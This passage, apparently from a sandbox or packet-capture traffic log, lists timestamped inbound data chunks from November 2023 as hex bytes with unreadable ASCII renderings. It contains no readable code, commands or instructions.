09 be 3e b9 ef f8 b5 2e 63 b2 a3 c3 aa 3a 39 13 16 f3 51 8b 23 4f 8d 9b 8a a9 de 9d d1 62 97 ab cd 87 8d 4e 0d e3 f8 b3 a2 85 ca 4c bb 74 Data Ascii: 5X,Yf\|MUSZmu-wvSd3Q`MA6\|r'm+96dEflr\|Th2r?PU*)Ns-dv)Tc6fc6&c^ZBfzFq:12N3MPzpf]!=%oiU2a(UbuD#I=~>.c:9Q#ObNLt
2023-11-18 09:02:39 UTC	1218	IN	Data Raw: e6 82 c5 60 05 58 07 b6 80 1d a0 13 f4 fc 1c f5 00 e4 83 0a 10 04 4d 60 31 58 03 da c0 76 b0 1f f4 ec 44 19 82 6c 90 0f 2a 40 04 34 81 15 60 0b d8 0e f6 81 6e 5f 20 5e 30 18 8c 05 11 d0 04 96 82 f5 60 2b e8 04 dd be c4 3e 82 01 60 38 f0 81 20 68 02 2d 60 1d d8 02 76 80 4e d0 e7 ab 0c 1a 08 f2 bf e2 ef 54 c5 fe 81 b9 60 31 58 03 36 83 6d 60 2f f8 0e 64 ee 47 dc 20 0f 14 82 0a 50 07 1a c1 7c b0 04 ac 06 eb c0 66 b0 0d ec 06 fb 41 b7 af 91 37 d0 1f 0c 06 85 c0 07 a6 83 3a d0 08 16 80 25 60 35 58 0f b6 80 0e b0 1f f4 f9 06 79 05 f9 a0 02 c4 c1 7c b0 04 ac 01 9b c1 76 b0 1f f4 fc 16 75 03 0c 06 63 41 1d 98 0b 9a c1 6a b0 01 b4 83 dd e0 3b d0 e7 3b 1c 0b 90 07 2a 40 1d 98 0b 16 83 d5 60 33 d8 0e f6 01 fa 2f ca 01 f4 07 79 c0 07 2a 41 23 58 0c d6 81 2d a0 03 74 Data Ascii: `XM`1XvDl@4`n_ ^0`+>`8 h-`vNT`1X6m`/dG P\|fA7:%`5Xy\|vucAj;;@`3/y*A#X-t
2023-11-18 09:02:39 UTC	1234	IN	Data Raw: 71 34 61 24 25 63 a2 a7 b9 76 f5 20 83 21 8c e4 64 ac af 11 ad b2 84 65 27 ac 88 96 39 c2 4a 23 ac a1 d6 79 42 4d 4f 6e 6d 69 6b f4 93 97 b3 e2 37 c7 c6 09 84 9c 91 dc ec a9 af 0e 21 8b 84 9c 49 fa ba cc 57 5d 8b 5f cd 88 5f 03 1a 27 25 e2 39 9e 99 1c 46 94 09 f1 92 e4 d6 aa da b6 aa 56 9f a7 d6 53 e7 01 b2 42 c8 b3 92 5b 71 bf f0 5b c3 db 5a ab 6b 3d 28 4e 25 f4 4b 93 9b c3 c5 35 42 ce 4a 6e 8e 10 d7 09 fd b2 e4 56 d2 37 98 80 36 e8 a0 41 88 b3 93 9b 43 89 26 21 ce 81 c5 c7 cb 17 6f bb 88 28 82 46 7e ff 24 0e fb e9 84 c1 95 27 0e 3b 76 0d 50 47 57 55 05 6d 91 bc be 28 de b6 01 a8 31 55 25 f9 45 0e 57 29 8a cf 99 fa 68 1c ae a1 17 7e 8f 7f 1e 7e 4d 20 6e 71 5c 55 45 6e 89 bb 2a 3b d7 5d 50 5c 84 92 e2 1d 89 29 f1 b0 58 15 b5 ad fe a2 f6 15 28 de 99 72 0d Data Ascii: q4a$%cv !de'9J#yBMOnmik7!IW]__'%9FVSB[q[Zk=(N%K5BJnV76AC&!o(F~$';vPGWUm(1U%EW)h~~M nq\UEn*;]P\)X(r
2023-11-18 09:02:39 UTC	1250	IN	Data Raw: 50 4a 10 02 f1 58 d0 49 10 02 f1 38 d0 49 11 02 f1 78 de 6b ec eb 5d 3c 37 7e 1e be 68 06 7f 7e 71 8a f7 fc 72 96 d1 85 ef ad 39 5b 3a 0d 23 ef bf 3d 1e df 57 6b da c3 ee e8 e7 fd 8f 7e ac 3f 7f 7a ff ca f3 18 7d 34 30 7b dd aa 81 cd 06 de c5 f3 8c 97 0f b1 b7 40 0e 87 ef bc c7 f7 d7 ba e7 d6 d8 7d 46 f0 39 b9 0d fe 27 12 f0 ee 5a 69 0f fb 43 31 79 ff 2f c5 f1 7b 17 f8 81 5a f3 73 ec 36 4a 9e bd d9 90 dd 12 5e bf 2e 48 1e e4 89 93 9f 39 dc 3f b8 c1 c0 0f f1 ef a9 7e 9d 4e 1d 1a 5c 63 e0 87 f9 7a b5 e7 17 b1 3f b8 e8 df bf c0 8f f0 b1 ce 84 3d 60 50 bc bf e6 b0 75 ce fb f8 8c ff 2e 20 fc 42 6d 7c 6f 8d ed 00 b6 fe c1 0a 1d a8 35 ad 63 2f 96 e7 7b d9 fb a3 36 c4 6b fa 22 0f 1a f3 f3 37 b1 8f 30 f3 f7 b4 19 f8 a5 5a cb 5f e5 d8 6d 54 36 8f 45 03 df eb 1f 59 Data Ascii: PJXI8Ixk]<7~h~qr9[:#=Wk~?z}40{@}F9'ZiC1y/{Zs6J^.H9?~N\cz?=`Pu. Bm\|o5c/{6k"70Z_mT6EY
2023-11-18 09:02:39 UTC	1266	IN	Data Raw: 03 fa 0d 6c b8 88 91 1b f1 4f fa 08 46 ee c3 11 a7 27 f0 1f df c5 7f 0c fc 06 fe 03 92 21 ca cc de 3e 96 a1 3f 94 32 54 51 64 68 eb 42 c5 30 10 f9 d5 1a 6d d2 07 47 0c d3 a8 1a d2 93 fe e0 3e a4 b4 a3 b6 9d dd 83 ce 09 52 ee 50 9e 18 6a 2b 77 6f 7b da 87 10 fc f8 3a 37 0f 1e 82 bd 74 ee 08 54 66 d4 b6 ad 7b 70 cc c8 9f 55 24 a8 32 a3 b6 ed dd 5b e7 a8 d7 04 f6 5f 6b 47 53 c7 e0 8c b9 72 c4 a8 1e 87 d6 8f 43 72 57 a8 fd 87 e9 c1 7a 1a bb c8 ae b5 e8 65 90 46 a0 47 3a 3e 18 2a b7 65 fc ff fb 52 b9 3d d8 85 9b 3d 9e 52 cc e4 c6 67 90 2f 1c f8 37 f2 10 18 1b 7b e7 74 33 d5 b6 a1 cb 88 fc e7 27 1f 84 1b a5 2a e3 1d 44 08 bc 03 9e 11 ef eb 96 63 49 b8 e5 c6 1b 48 b4 96 00 d9 34 70 23 ee 28 cd 96 00 b0 c1 f6 94 20 0b f3 59 e8 5c 9f 39 05 25 a7 47 3f 08 25 67 80 Data Ascii: lOF'!>?2TQdhB0mG>RPj+wo{:7tTf{pU$2[_kGSrCrWzeFG:>eR==Rg/7{t3'DcIH4p#( Y\9%G?%g
2023-11-18 09:02:39 UTC	1282	IN	Data Raw: 66 62 8d f3 71 d0 48 3a cb 40 82 5e ac c1 ea c0 17 37 e0 d8 6f 8c fe 13 06 7c b0 98 9d 36 e2 49 03 3e 96 d8 e6 2b c2 88 96 e3 ff fd 54 46 8c b1 ef 99 2f 65 66 39 32 2a 22 a1 69 5c b2 94 f6 8c e4 67 b5 37 e1 98 01 c7 c2 9e 1a 28 66 b4 c9 1d 8e 22 e3 86 11 38 3b 85 df 17 a6 ca e3 ec 84 15 1c cc ef 2c 33 ce b6 62 b0 b1 f8 2f 38 c2 a6 36 c9 78 88 ab 73 95 73 5a 9e a9 11 57 c9 a6 55 b4 fb 38 d3 2a da b4 82 76 f3 55 b6 b8 f6 4c cc ed 21 9e 9b 3a 85 f9 97 f6 7e f1 6c 5d 67 5a ed 69 73 14 cf b6 f5 e2 9c 77 21 9f c7 61 5c 7d 05 7a 9e 35 83 30 92 73 8c 8f f6 9e af 77 8b f3 48 98 20 a3 de c5 93 ed a9 94 aa af 69 cf 2f 44 4c 4f c5 ae 0d 62 44 d1 24 fe e9 8f 78 c6 ff 9b b9 fb 0f 8e a3 ba 0f 00 fe f6 7e f8 6e f5 fb 4e ba d3 6f db 18 83 81 52 b0 8d c1 40 0d 44 96 65 5b Data Ascii: fbqH:@^7o\|6I>+TF/ef92"i\g7(f"8;,3b/86xssZWU8vUL!:~l]gZisw!a\}z50swH i/DLObD$x~nNoR@De[
2023-11-18 09:02:39 UTC	1298	IN	Data Raw: 6f 92 be d5 8e 2e 3e eb 30 c2 05 a4 73 2d 07 57 0d 16 7c 4d 8e 4b ad 6c 32 1a b7 14 9a ff 17 69 aa d2 88 df 46 8e aa 54 da 6f 93 5e 95 bf 2e 76 7a 25 29 93 83 e9 dd 0e 1c 9f f4 13 73 b3 f1 4c 76 bb 0c 5f 27 d8 c9 97 6f b6 30 73 48 13 a7 6a b4 5b eb dc 2e d7 52 75 12 63 da f8 63 ab 6c 70 22 c5 4d c0 d4 64 f5 32 35 1a f1 3d d4 52 7c 6c 4e 18 52 bd 6e 07 78 a6 76 6e 49 dc c7 30 a5 45 3b ca 36 97 ab 09 35 55 fa 7d 82 9a 87 2d 00 95 d5 a0 cb 29 fb e4 89 69 d1 0b 62 3e 40 ca 32 cc 6a 06 ab ad ce a6 ec d7 b8 5a 60 d5 4f a4 a4 b0 3c 1c 75 9e 56 87 d7 d6 28 0f f0 fc bb 44 44 4a 4e 8b e1 2b c9 db 06 d6 06 dc 3a 59 6a 75 38 59 9b 4a 51 b3 36 34 b9 6a ad 4d cc 41 c7 57 7f 7b c0 54 20 2d 35 ac e8 60 22 6c 56 ea e5 72 8b 87 48 69 b1 98 22 04 a5 ab 79 58 a9 6b ad b6 25 Data Ascii: o.>0s-W\|MKl2iFTo^.vz%)sLv_'o0sHj[.Rucclp"Md25=R\|lNRnxvnI0E;65U}-)ib>@2jZ`O<uV(DDJN+:Yju8YJQ64jMAW{T -5`"lVrHi"yXk%
2023-11-18 09:02:39 UTC	1364	IN	Data Raw: 19 bc c1 d5 50 33 08 82 2e 6b fd ba ac 23 1a 0b 51 2b a9 f7 ab ce 27 98 9f 45 f3 64 95 3a 04 2f 94 3d 1c 2d 68 0f c8 ab 48 31 8c 00 5c 0d ef 22 41 3a 03 b5 a2 8b d4 89 2e 12 12 5d a4 9e ba 48 98 77 91 06 3a 37 8d 74 f0 4d d4 45 22 c4 45 9a c5 e9 8e 8a d3 dd 02 d3 1a f3 4f 6b 9c b8 48 a2 17 79 a6 cf f8 c9 6d e2 64 19 da a5 28 da a5 65 68 d7 46 d1 ae 9d 47 bb 8c 1c ed 3a 64 68 d7 c9 a3 5d 17 a0 5d b7 18 fb f6 88 7e dc cb c7 67 9c 07 f6 b1 23 07 e6 6d 5c 01 71 85 ed 7c 5c a5 13 c7 d9 41 82 ae 9d 21 05 c2 ab 5d 8c eb ec 66 5c aa 5f 1a 5e 0d 78 68 31 c8 a0 c5 90 17 f4 0d d3 b8 6d 8f af 73 1c 16 d3 90 6c 2f 1b 1f ef 03 4e af 17 28 ba 6f c4 01 81 fd 5e 4c 7d a0 5f f1 26 83 a0 cb 41 3e 54 3d c4 ce 81 1b f9 32 60 48 6a 1d e5 41 e8 18 cb c1 4d f2 71 dd 1f 6a 9c 90 Data Ascii: P3.k#Q+'Ed:/=-hH1\"A:.]Hw:7tME"EOkHymd(ehFG:dh]]~g#m\q\|\A!]f\_^xh1msl/N(o^L}_&A>T=2`HjAMqj
2023-11-18 09:02:39 UTC	1428	IN	Data Raw: 61 b8 25 f3 50 68 60 9c c0 e7 14 df 00 57 a6 13 b1 c4 27 17 9b 03 7d 99 6b d2 6b 3e 77 36 79 e3 68 5c 99 1f 99 eb dc 1d 99 dd 10 99 db 3e 02 59 1a c2 db 23 35 0d 11 94 af 35 30 f0 b1 c2 6e c7 e0 c0 75 45 7a c1 9d ea 40 68 9f 6e 2a 78 ae fe 85 fa 2f d6 3f 4f 4d 99 17 56 c7 ed c0 f3 75 e1 31 da bb 88 d2 5e 21 58 f8 a6 da 46 2b 88 57 f5 c0 ab 7a e0 15 cd ff d2 c8 f4 c5 91 9a 77 46 a6 53 7c 03 ff 12 c6 d5 8f 40 ab e9 06 d6 1e 82 d5 4b f1 e5 a6 ef a9 c8 f9 d7 47 aa 9a 22 e7 cf 8f 54 35 98 39 ad a7 06 cd 36 f9 ad a7 ce 26 ef 0a 8c 55 13 e5 21 94 0d 2d 0e 2f 8d 9c bf 28 52 b5 2d ab 64 3c ec 97 3b 48 e5 be 17 28 d7 49 39 16 3c 87 e5 d2 26 eb 6b 2d 07 2b 25 35 77 ff 31 a7 af 80 6a 3f 7d 36 79 91 95 79 3e fc f4 59 5e eb 55 e6 f9 04 3d d7 65 e1 cd 76 83 15 84 b7 26 Data Ascii: a%Ph`W'}kk>w6yh\>Y#550nuEz@hn*x/?OMVu1^!XF+WzwFS\|@KG"T596&U!-/(R-d<;H(I9<&k-+%5w1j?}6yy>Y^U=ev&
2023-11-18 09:02:39 UTC	1475	IN	Data Raw: c1 28 f5 c3 1b 6d b7 8a af 99 df 6a 53 3f a5 64 ff 63 56 99 8f 6f 8c f8 2a c4 f0 57 6b 0d 81 78 1b ef 01 be 44 82 37 f2 d4 0f ef 0d fe 58 7c 37 f2 bb 83 4e 40 cd 31 be b7 c5 57 cd aa 8e f1 fd 58 7c 37 8b 85 c5 7d ac 44 fd 19 fe 76 8a ef 06 56 7d ac 54 98 2b 95 c7 4a 3d b8 fa 0d 84 66 6e f1 0d 17 df df 0c 84 8d 79 86 b4 4b 54 ce 73 e2 fb 9d f8 f6 8a ef ca 61 82 f5 12 df ef c5 77 54 7c e7 9f 2d d2 2a be f6 12 41 2b be f8 70 e3 7f ba f0 7f 58 7c 8d fc fc e8 8a 12 a2 eb 15 df 30 41 57 3d dc 4f bf 80 1f db ec 18 4a f1 b6 8b 70 37 fe 1f 77 77 1e de 54 99 ef 01 3c 29 55 50 0a 06 28 7b 2d 07 65 13 a4 4d cb 22 20 42 58 05 37 a2 02 82 5b 4f a1 05 aa 14 42 5b 11 ae 8e 46 19 77 e7 4e 54 40 45 90 c8 b8 7b d5 c8 e2 28 17 67 a2 83 78 d1 8b c6 1d 19 97 b8 02 2a 63 44 c6 Data Ascii: (mjS?dcVoWkxD7X\|7N@1WX\|7}DvV}T+J=fnyKTsawT\|-A+pX\|0AW=OJp7wwT<)UP({-eM" BX7[OB[FwNT@E{(gx*cD
2023-11-18 09:02:39 UTC	1523	IN	Data Raw: 66 9a d3 ea 07 f5 9c 7e c3 34 a7 11 41 4e c7 8f e9 39 5d 30 cd 69 d4 c8 69 3c 99 9c b9 90 be f8 f4 c1 a4 6e 69 a7 ca 6f 5b e7 74 6f 8c 32 f8 49 cd 7b 9c d3 bf 89 ea 39 bd 30 69 76 d7 f1 c5 5b f4 9c 86 4c fb 61 43 b0 bf 7f ee 4e 3d 17 37 98 3e 59 5b 18 b2 7e b2 96 14 e4 ab 7e cc fa 0c 90 ee cd d7 80 a7 ae ef a8 f9 6a 08 f2 d5 f8 7f cc d7 3d af e8 f9 3a 63 9a af 9f df 6a 9d af 8e 20 5f 4f fe 8a 9e af 13 a6 f9 7a 41 90 af ac 20 5f 5b 82 7c 7d ed fa 83 77 9b bf 74 29 75 f1 dc 85 f4 59 3d 6d c7 9f 55 af a4 04 f9 6a 19 f9 7a 10 7b f7 7b 9d af af bd a5 e7 eb 1a 75 0a ae 1c 98 af fb 6f d3 f3 f5 3f 8a 59 cf 7c f5 76 bd 67 de a0 98 e5 d4 39 64 9d d3 af 7c 58 cf e9 5b 8a 59 4e 5f 32 72 ca 27 86 ca 7e 4e 17 04 39 75 5e a1 e7 74 dc 34 a7 2b 7d 39 4d 9d 7d ea e2 f9 33 Data Ascii: f~4AN9]0ii<nio[to2I{90iv[LaCN=7>Y[~~j=:cj _OzA _[\|}wt)uY=mUjz{{uo?Y\|vg9d\|X[YN_2r'~N9u^t4+}9M}3
2023-11-18 09:02:39 UTC	1577	IN	Data Raw: 43 0e a6 bc bd 3d e0 06 23 02 b1 60 93 8f bb 39 e0 50 9b a3 83 e5 26 e5 aa 6f e6 f7 50 b4 2d 88 58 bc 5b eb 1a 27 62 2d 74 9e 31 0a 73 ee b7 04 28 68 cf d8 ec 41 ff c4 ec 5d de e0 1b 2b ed 8d b4 f7 0c 13 69 cf c4 49 36 e1 ac cc 96 cb fd 09 b2 4b 09 ee e5 43 6c 33 25 41 83 94 5d 68 19 6d 8e d1 7b e4 f7 7d 48 47 48 94 cf e9 f7 f7 8d 9a 22 73 6c 1b 92 e5 e6 d2 1c 92 4f 25 25 22 76 6c d6 ee 09 0c 93 d8 8a 85 5c 05 10 eb 37 bb 88 87 92 6e b9 1e 90 a8 9b f1 20 8f 87 6a 41 80 a2 21 96 a1 0b be c1 27 d0 6a a2 a3 a9 48 d3 6c f2 30 53 34 30 ba 50 5e 90 9e 81 6d bf b8 bb 03 d2 ae 0a d8 1d b0 6f 48 21 d1 ad 02 3f 15 1d 47 fb 9d 98 d4 e1 34 3b 14 20 00 d7 49 09 b8 99 03 f9 81 21 cf 61 06 5f 26 c4 75 d9 45 db ee 69 37 e0 45 86 b4 43 b3 04 99 4d 0d 0e a0 be 04 a7 08 ba Data Ascii: C=#`9P&oP-X['b-t1s(hA]+iI6KCl3%A]hm{}HGH"slO%%"vl\7n jA!'jHl0S40P^moH!?G4; I!a_&uEi7ECM
2023-11-18 09:02:39 UTC	1620	IN	Data Raw: 7d 66 ef 1b 7b df d9 eb 1d ed 19 3d 6f 74 df e8 fc e8 67 47 bf 34 fa d5 d1 af 8f de 38 7a cf e8 9b a3 f8 d6 22 1e 52 5c 81 9e 40 7f 60 6b 60 1c 6c 4e 04 96 02 85 c0 67 02 37 06 6e 09 dc 17 78 22 f0 46 60 dd c0 85 03 33 03 05 b0 fb 33 03 7f 3f 70 cd c0 77 06 1e 1d 78 72 e0 59 b0 fd 9d 81 ee e0 e6 e0 40 d0 08 96 82 47 83 9f 84 5e 5c 15 bc 2d f8 54 f0 f9 e0 2b c1 8e c1 8d 83 c1 c1 d9 c1 f9 c1 bf 1d fc 87 c1 6b 06 bf 33 78 c7 e0 fd 83 6f 0e fe 6a f0 0f 83 ef 0d 3e be f3 d9 9d 6f ed fc c5 ce df ee fc e3 ce a9 21 7d 28 3b 74 74 e8 ef 86 3e 3b f4 f9 a1 67 86 5e 19 fa e5 d0 ef 86 7c c3 1d c3 a7 0f 6f 1b de 31 3c 3c 6c 0c 67 87 2f 1d be 7a f8 6b c3 df 1f be 7b f8 be e1 87 86 7f 34 bc 75 d7 d0 ae f0 2e 69 97 b2 eb 0b bb 8e ef 0a 8e ec 19 09 8d ec 1b 89 8f 5c 34 32 Data Ascii: }f{=otgG48z"R\@`k`lNg7nx"F`33?pwxrY@G^\-T+k3xoj>o!}(;tt>;g^\|o1<<lg/zk{4u.i\42
2023-11-18 09:02:39 UTC	1636	IN	Data Raw: 91 84 40 bc 1a 2e d6 52 08 c4 bf 56 eb 79 42 20 5e 03 fb 7a 21 10 3f 04 3b 19 42 20 7e 18 96 72 84 40 bc 16 16 5b 0a 81 78 1d ac e7 08 81 f8 11 e5 82 4f 57 f2 a8 92 69 ae c6 c7 94 92 20 04 e2 f5 4a 9e 21 04 e2 c7 95 a6 ee 12 db 00 5b 92 10 88 37 aa a1 24 04 e2 27 84 8a 24 04 e2 df c0 34 43 08 c4 4f c2 92 2a 04 e2 a7 f4 b9 28 04 e2 a7 61 2b 5b 08 c4 9b 60 4f 16 02 f1 33 ea 55 96 86 cf aa a1 24 04 e2 cd 6a 25 11 02 f1 73 6a 28 0b 81 f8 79 d8 c9 10 02 f1 16 e5 91 5e 74 fd f0 56 e5 c4 49 85 17 60 21 47 08 c4 2f c2 a2 2c 04 e2 6d 52 2a 0b 81 78 3b 2c 28 42 20 de a1 8b 35 42 20 7e 29 bf 18 0b 81 f8 e5 fc 5e 2c 04 e2 57 da da f0 04 03 ef 6c 67 c3 41 ef d5 76 36 1c f4 76 b5 b5 e1 7e 03 bf d6 ce 86 83 de eb ed 6c 38 e8 ed 6e 6b c3 13 0d bc a7 9d 0d 07 bd 37 da d9 Data Ascii: @.RVyB ^z!?;B ~r@[xOWi J![7$'$4CO(a+[`O3U$j%sj(y^tVI`!G/,mRx;,(B 5B ~)^,WlgAv6v~l8nk7
2023-11-18 09:02:39 UTC	1652	IN	Data Raw: 96 7d 11 2d bf 49 b2 4b 8a eb b1 65 b4 5a 2b 90 5d 28 ad 1e 5b 9e b5 ca 8a eb b1 8b 3c 66 a1 b8 1e bb c4 eb e0 8a eb b1 6e e1 48 d8 8a eb f1 d6 4a 9c ef ca 74 9a 13 1a d6 76 f5 a5 91 ed 58 53 bd 21 89 0c c8 b6 85 83 5d 4e 9f c9 91 1c 5a fe 19 7e 63 1a 9a 0e 00 5d 02 5c 96 d9 90 06 77 5d 72 7f 23 21 a1 67 1b f1 db 1e 87 97 c4 69 43 24 95 22 a4 14 1b b4 31 8a 37 2e 29 ed e4 ac cc 94 31 16 0b 35 94 ae c6 f7 ec 69 53 fd 24 2c 29 40 86 a0 b1 18 bf 8a 82 2b 83 a1 4c df 0b 89 2b b1 2f 8c 4b f3 25 42 87 37 21 3c 1c 9a 0a 43 aa 32 3b 4d 2f 9e b7 68 a5 45 a3 a7 57 51 2c c2 de d6 34 d8 f5 01 27 fb 5c dd 44 48 75 d7 ec ee 6e f3 bd 14 7a 55 1d de 7d da 8d a4 da a4 19 d3 ef 15 e1 f8 b4 1b f5 ea 3e 53 f5 96 d0 8d 43 3e e7 b6 48 cd 00 a4 42 26 5d 21 24 1a 0a c3 e9 25 f4 Data Ascii: }-IKeZ+]([<fnHJtvXS!]NZ~c]\w]r#!giC$"17.)15iS$,)@+L+/K%B7!<C2;M/hEWQ,4'\DHunzU}>SC>HB&]!$%
2023-11-18 09:02:39 UTC	1668	IN	Data Raw: 8d 81 21 6c 0c 0c 61 63 60 0a 1b 03 43 d8 18 18 c2 c6 c0 14 36 06 86 b0 31 30 84 8d 81 29 6c 0c 0c 61 63 60 08 1b 03 63 d8 18 18 c2 c6 c0 14 36 06 a6 b0 31 30 85 8d 81 29 6c 0c 4c 61 63 d0 25 6c 0c ba 84 8d 41 37 b0 31 e8 06 36 06 e6 b0 31 30 87 8d 81 21 6c 0c 8c 61 63 60 08 1b 03 73 d8 18 98 c0 c6 c0 1c 36 06 86 b0 31 e8 0a 36 06 dd c1 c6 60 99 b0 31 58 26 6c 0c 96 03 1b 83 e5 c0 c6 a0 3b d8 18 74 07 1b 83 ee 61 63 d0 3d 6c 0c de 13 d8 18 bc 4b d8 18 2c 13 36 06 ef 29 6c 0c de 23 d8 18 bc 4b d8 18 bc 4b d8 18 74 05 1b 03 73 d8 18 2c 0b 36 06 dd c3 c6 c0 04 36 06 c6 b0 31 30 87 8d 81 01 6c 0c f4 b0 31 d0 c1 c6 40 03 1b 03 13 d8 18 98 c3 c6 40 0f 1b 03 13 d8 18 18 c0 c6 40 0f 1b 03 73 d8 18 a8 61 63 60 0e 1b 03 13 d8 18 74 01 1b 03 3d 6c 0c 8c 61 63 a0 87 Data Ascii: !lac`C610)lac`c610)lLac%lA71610!lac`s616`1X&l;tac=lK,6)l#KKts,6610l1@@@sac`t=lac
2023-11-18 09:02:39 UTC	1684	IN	Data Raw: a3 d1 34 7f 5e a9 fb b8 d1 5b 60 36 7b fc 2e 87 37 49 0f 29 3d 1d 6b e7 bb bf d6 58 c2 db 50 c0 89 14 16 1a c9 d3 43 61 12 0c a1 70 52 e2 a9 4d 95 ee e3 5a b1 b7 cb f0 6a d6 6f 20 85 d8 06 25 74 6e 78 11 5e dd bd 71 86 e6 a3 3c f5 18 78 48 4f b9 41 92 62 61 ee 1d c6 85 8b 97 6c d7 33 19 89 16 77 af c6 e0 f9 3d bc 55 6e 40 31 eb cd c3 72 bd 0b b4 96 ee 50 b2 4f b8 81 59 db 0c cd bb 54 f5 ee c7 3a bb a0 ce d1 58 27 d4 78 d8 72 48 ae 53 63 68 be 1c ea a0 2f 8f df d0 fc 2a 63 2c 1a f5 3e 7c 79 0e 19 9a bd 18 ba e9 35 4c 22 a4 78 cb cc a9 81 02 b3 16 85 90 58 66 d6 c1 b7 49 4c 34 87 db dd c7 f5 ee 04 6c b7 06 30 26 cc 39 da 2d b1 9f 55 2d 0a 71 7f 03 2d 0c 24 60 6d d8 ac c7 08 3b 4a 18 1c 12 0e 87 15 92 37 b2 b7 28 ec 56 0c 7b 23 9a 32 78 1f 06 40 73 5b 10 1b Data Ascii: 4^[`6{.7I)=kXPCapRMZjo %tnx^q<xHOAbal3w=Un@1rPOYT:X'xrHSch/*c,>\|y5L"xXfIL4l0&9-U-q-$`m;J7(V{#2x@s[
2023-11-18 09:02:39 UTC	1700	IN	Data Raw: 8b c3 0b 8d c0 c3 84 5e 79 e1 e7 d9 2d a0 99 58 ab e9 b5 06 0c be 12 8d fc 0b 52 a0 03 f8 0a 66 b1 b4 8f e8 7a b7 d3 3e e1 21 26 7e 2c fe 5d 19 5f 24 97 16 5c 14 cf b8 a5 b8 bd 67 c5 e0 de 2f 86 c0 00 29 89 b3 ee 74 1d f3 e6 9a bd f8 ab 5e 7e 18 00 0f 31 c3 66 18 1e d8 c9 e3 0d 9b 8b cd 13 23 1c 8b 41 19 e2 6c 2d b0 f5 90 f7 c4 91 f8 99 8f 69 0b 30 d9 4c c3 e6 5a f3 6c 88 c2 a4 d2 90 f7 82 33 2e 70 fd 7d 0b d2 2a f8 6e e4 77 d5 80 cf 26 1b 36 a3 45 c9 88 c2 83 7c 9e 90 d1 f0 c9 7f d8 16 ba 2a e8 bb a0 4a 9f 8d ad dd 26 df b2 61 d4 c8 19 f0 fb 9d 38 25 c3 22 b9 ba 16 40 57 8b 77 75 c3 78 4c b9 df b0 79 8d 8b 69 ce 69 a0 a5 89 f7 43 6f b8 bf d1 b8 fe 51 a5 19 1e 5c 77 91 3c 12 50 de b0 e0 e6 0b 44 6c 23 f2 74 f0 16 5c 0d 06 82 5d 03 fe 9e 54 32 fe 0a 35 5d Data Ascii: ^y-XRfz>!&~,]_$\g/)t^~1f#Al-i0LZl3.p}nw&6E\|J&a8%"@WwuxLyiiCoQ\w<PDl#t\]T25]
2023-11-18 09:02:39 UTC	1716	IN	Data Raw: 71 a1 1a 17 29 34 61 84 83 81 2d 5d 15 6b 80 77 4b fe 8e 39 2c 38 dd b8 c9 41 55 65 fe da f8 d7 28 98 f9 d7 c3 f9 15 62 38 b3 06 84 2f 48 4c 67 6f d5 80 36 7e e0 ba e0 74 de 5d fc fc d3 90 e8 32 5e 7b 53 69 c3 1c de 3b 92 fd 81 b7 a8 a4 a1 95 f7 e0 64 33 a8 8e 35 dc cf 7e c2 96 ae 8c 35 bc c1 7e c2 86 87 c6 d0 97 c3 e0 bf 8a 7f d3 33 3d 49 46 9f 91 e9 49 92 57 3b 92 81 f7 20 e9 5c d8 da dd d2 bd b0 bd 67 24 fb c3 d7 68 fa d0 33 b2 a7 7b fe c8 d6 96 6e 66 ef 1e 60 5b 12 23 44 a6 5d d2 57 9e 6c 63 12 7b 27 12 47 13 12 6d 62 f0 b8 dc 84 44 5b 50 92 c8 d9 84 44 4f d8 9a 90 78 c6 e4 d3 84 44 5b 83 eb 3a b9 16 7f b7 5b 13 12 ed 4d 1c 2e 82 2b 3e 09 37 b2 6d 98 1c 77 34 21 d1 b6 e3 f0 21 45 13 12 6d 87 b0 cb 4d 48 b4 9d 38 d2 24 35 21 d1 de c1 f4 16 47 13 12 6d Data Ascii: q)4a-]kwK9,8AUe(b8/HLgo6~t]2^{Si;d35~5~3=IFIW; \g$h3{nf`[#D]Wlc{'GmbD[PDOxD[:[M.+>7mw4!!EmMH8$5!Gm
2023-11-18 09:02:39 UTC	1732	IN	Data Raw: 98 72 9e 19 53 ce 33 63 ca 79 e6 4c 39 cf 9c 29 e7 df 0b 53 ce bf 23 53 ce 07 c9 94 f3 ef 95 29 e7 df 13 53 ce bf 23 53 ce bf 23 53 ce 33 62 ca b9 7b a6 9c 0f 8a 29 e7 99 33 e5 dc 0d 53 ce 5d 33 e5 76 96 3a 53 6e 62 ca b9 0b a6 9c a7 67 ca 79 3a a6 9c a7 61 ca b9 1b a6 9c bb 67 ca 79 7a a6 9c bb 61 ca b9 0b a6 9c a7 67 ca b9 7b a6 9c 3b 33 e5 dc 3d 53 ce dd 30 e5 3c 03 a6 9c a7 67 ca b9 6b a6 9c a7 67 ca 79 5a a6 9c a7 65 ca 79 5a a6 9c bb 61 ca b9 0b a6 9c bb 60 ca b9 4b a6 1c ed 22 06 a6 fc 6e a4 b7 75 a6 5c 3c f3 88 ea 4c b9 fc 4a 3f ce 94 a3 d2 1f 8d 33 e5 a8 0d 46 e3 4c 39 5e 86 a3 46 a6 5c 7c 29 1d 35 30 e5 28 28 8c 26 31 e5 4b 93 99 f2 20 34 26 84 2d 1a 28 95 8f 0b 92 98 f2 97 4b f1 cb fa 47 4a f1 0b 6b 23 53 7e c4 89 29 0f 89 66 97 a9 2f 8c b1 a8 Data Ascii: rS3cyL9)S#S)S#S#S3b{)3S]3v:Snbgy:agyzag{;3=S0<gkgyZeyZa`K"nu\<LJ?3FL9^F\\|)50((&1K 4&-(KGJk#S~)f/
2023-11-18 09:02:39 UTC	1748	IN	Data Raw: b1 3b 55 d0 99 ad 06 b1 dd 2a be 0f 56 83 d8 5d 6a 80 30 ab 41 ec ee 48 a6 49 9c f7 44 a2 22 ad 06 b1 3d 26 a8 5e ad 06 b1 7b 23 d1 aa d5 20 b6 37 92 6f 62 d2 85 dd a7 c2 22 ac 06 b1 6e 95 dd 27 ab 41 ec fe be 05 09 b3 1a c4 f6 a9 c1 ce 68 35 88 fd 25 12 1e cd 6a 10 7b 40 c5 9b 5b 0d 62 0f aa 98 5e ac 06 b1 87 54 50 14 ab 41 ec 61 15 78 46 ab 41 ec 11 15 1e c5 6a 10 7b 34 a2 c1 07 85 3c 16 c1 33 69 8d 8f 47 80 42 ac 06 b1 fd 11 fc 5e ac 06 b1 27 22 90 66 4d ec 49 15 15 66 35 88 fd 35 92 19 66 35 88 3d 15 02 09 b3 1a c4 0e a8 dc 5e ac 06 b1 a7 55 50 a4 d5 20 f6 8c 39 3f d4 6a 10 7b 56 45 f5 6e 35 88 fd 4d c5 85 